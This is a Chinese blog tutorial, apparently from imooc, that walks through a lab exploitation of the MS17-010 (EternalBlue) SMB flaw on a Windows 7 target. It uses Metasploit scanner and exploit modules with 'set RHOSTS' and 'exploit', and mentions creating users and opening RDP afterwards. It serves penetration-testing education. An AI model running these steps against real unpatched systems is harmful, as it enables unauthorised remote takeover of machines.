为了账号安全,请及时绑定邮箱和手机立即绑定

利用MS17-010漏洞拿下服务器

MS17-010漏洞介绍

    MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

影响版本

    Windows Vista、Windows Server 2003/2008/2012/2016、Windows XP、Windows 7、Windows 8.1、Windows 10

环境搭建

攻击机:kali2018.4

靶机:windows 7 sp1 X64

win7关闭防火墙

攻击过程

打开kali的msf,使用search命令搜索ms17-010

https://img1.sycdn.imooc.com//5c8852f700019c7708160382.jpg

选择auxiliary/scanner/smb/smb_ms17_010

https://img1.sycdn.imooc.com//5c885323000193c606010045.jpg

使用show options查看需要配置哪些选项

https://img1.sycdn.imooc.com//5c88535c0001578411460398.jpg

配置目标主机:set RHOSTS 192.168.1.2

https://img1.sycdn.imooc.com//5c8853960001b60a07930342.jpg

使用exploit执行,确认(192.168.1.2)存在ms17-010漏洞

https://img1.sycdn.imooc.com//5c8853c7000163bb07220108.jpg

使用攻击模块exploit/windows/smb/ms17_010_eternalblue

https://img1.sycdn.imooc.com//5c8853f00001bf8104630018.jpg

查看需要配置的选项

https://img1.sycdn.imooc.com//5c88547c0001d6bd07890571.jpg

设置目标地址

https://img1.sycdn.imooc.com//5c8854ad000150c906400036.jpg

Exploit开始攻击

https://img1.sycdn.imooc.com//5c8855160001d56907850495.jpg

https://img1.sycdn.imooc.com//5c88559e0001218807830344.jpg

ok,到此已经拿下服务器权限,上图可见已经可以执行cmd命令,可以创建用户,开启3389端口然后远程控制等。

附加信息:我在慕课网上免费课程欢迎大家观看:web渗透测试入门

需要靶机的朋友加我qq:981139459

https://img1.sycdn.imooc.com//5c88567a000134f608550810.jpg

点击查看更多内容
5人点赞

若觉得本文不错,就分享一下吧!

评论

作者其他优质文章

正在加载中
感谢您的支持,我会继续努力的~
扫码打赏,你说多少就多少
赞赏金额会直接到老师账户
支付方式
打开微信扫一扫,即可进行扫码打赏哦
今天注册有机会得

100积分直接送

付费专栏免费学

大额优惠券免费领

立即参与 放弃机会
意见反馈 帮助中心 APP下载
官方微信

举报

0/150
提交
取消